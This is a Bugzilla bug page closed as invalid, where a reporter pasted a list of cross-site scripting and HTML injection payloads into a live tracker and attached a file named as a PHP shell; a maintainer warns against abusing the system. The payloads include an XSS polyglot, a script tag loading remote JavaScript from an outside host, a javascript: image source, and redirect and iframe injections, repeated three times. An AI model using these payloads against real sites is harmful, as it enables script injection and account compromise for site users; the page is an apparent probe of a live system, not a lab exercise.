Closed Bug 772015 Opened 13 years ago Closed 13 years ago

dsfsdfds

Categories

(Bugzilla :: Creating/Changing Bugs, defect)

2.10
defect
Not set
normal

Tracking

()

RESOLVED INVALID

People

(Reporter: eusebiu.blindu, Unassigned)

Details

Attachments

(1 file)

Attached file knull-shellv1-beta.php
User Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11 Steps to reproduce: 1)REDIRECT <meta HTTP-EQUIV="REFRESH" content="0; url=http://www.testalways.com"> 2)IFRAME <iframe src="http://www.testalways.com/"></iframe> 3)IMAGE tag <img src="http://www.testalways.com/utest/hack.gif" /> <img src="http://bit.ly/J9EeDQ" /> 4) ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> 5) '';!--"<XSS>=&{()} 6) <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> 7) <IMG SRC="javascript:alert('XSS');"> 8)http://ha.ckers.org/xss.html Actual results: 1)REDIRECT <meta HTTP-EQUIV="REFRESH" content="0; url=http://www.testalways.com"> 2)IFRAME <iframe src="http://www.testalways.com/"></iframe> 3)IMAGE tag <img src="http://www.testalways.com/utest/hack.gif" /> <img src="http://bit.ly/J9EeDQ" /> 4) ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> 5) '';!--"<XSS>=&{()} 6) <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> 7) <IMG SRC="javascript:alert('XSS');"> 8)http://ha.ckers.org/xss.html Expected results: 1)REDIRECT <meta HTTP-EQUIV="REFRESH" content="0; url=http://www.testalways.com"> 2)IFRAME <iframe src="http://www.testalways.com/"></iframe> 3)IMAGE tag <img src="http://www.testalways.com/utest/hack.gif" /> <img src="http://bit.ly/J9EeDQ" /> 4) ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> 5) '';!--"<XSS>=&{()} 6) <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> 7) <IMG SRC="javascript:alert('XSS');"> 8)http://ha.ckers.org/xss.html
Please don't create test bugs here, this is a live Bugzilla instance. Use http://landfill.bugzilla.org/ if you want to test things. If you continue to abuse the system your account will be locked.
Status: UNCONFIRMED → RESOLVED
Closed: 13 years ago
Resolution: --- → INVALID
You need to log in before you can comment on or make changes to this bug.

Attachment

General

Creator:
Created:
Updated:
Size: